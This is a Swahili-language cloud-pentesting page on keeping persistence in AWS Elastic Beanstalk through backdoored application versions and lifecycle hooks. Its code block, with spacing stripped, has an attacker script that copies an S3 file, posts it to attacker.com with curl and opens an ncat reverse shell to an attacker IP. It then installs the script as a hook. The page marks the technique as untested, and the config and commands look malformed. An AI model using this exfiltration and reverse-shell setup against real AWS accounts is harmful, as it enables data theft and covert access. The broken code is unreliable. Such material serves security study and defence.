Ili kudumisha uthabiti ndani ya akaunti ya AWS, baadhi ya mifumo ya uthabiti inaweza kuingizwa ndani ya kifaa (kazi ya cron, ufunguo wa ssh...) ili muhusika aweze kufikia na kuiba sifa za jukumu la IAM kutoka kwa huduma ya metadata.
Mlango wa Nyuma kwenye Toleo
Mshambuliaji anaweza kuweka mlango wa nyuma kwenye nambari ndani ya repo ya S3 ili iendelee kutekeleza mlango wake wa nyuma na nambari inayotarajiwa.
Toleo Jipya lenye Mlango wa Nyuma
Badala ya kubadilisha nambari kwenye toleo halisi, mshambuliaji anaweza kupeleka toleo jipya lenye mlango wa nyuma wa programu.
Kutumia Kitanzi cha Maisha cha Malipo ya Rasilimali za Desturi
TODO: Jaribu
Elastic Beanstalk hutoa vitanzi vya maisha vinavyokuwezesha kukimbia hati za desturi wakati wa utoaji na kufutwa kwa kifaa. Mshambuliaji anaweza kuwezesha kitanzi cha maisha kutekeleza mara kwa mara hati ambayo inaondoa data au inadumisha ufikiaji wa akaunti ya AWS.
bashCopycode#Attackercreatesascriptthatexfiltratesdataandmaintainsaccessecho'#!/bin/bashaws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csvgzip /tmp/data.csvcurl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfilncat -e /bin/bash --ssl attacker-ip 12345'>stealthy_lifecycle_hook.sh# Attacker uploads the script to an S3 bucketawss3cpstealthy_lifecycle_hook.shs3://attacker-bucket/stealthy_lifecycle_hook.sh# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hookecho'Resources:AWSEBAutoScalingGroup:Metadata:AWS::ElasticBeanstalk::Ext:TriggerConfiguration:triggers:- name: stealthy-lifecycle-hookevents:- "autoscaling:EC2_INSTANCE_LAUNCH"- "autoscaling:EC2_INSTANCE_TERMINATE"target:ref: "AWS::ElasticBeanstalk::Environment"arn:Fn::GetAtt:- "AWS::ElasticBeanstalk::Environment"- "Arn"stealthyLifecycleHook:Type: AWS::AutoScaling::LifecycleHookProperties:AutoScalingGroupName:Ref: AWSEBAutoScalingGroupLifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHINGNotificationTargetARN:Ref: stealthy-lifecycle-hookRoleARN:Fn::GetAtt:- AWSEBAutoScalingGroup- Arn'>stealthy_lifecycle_hook.yaml# Attacker applies the new environment configurationaws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"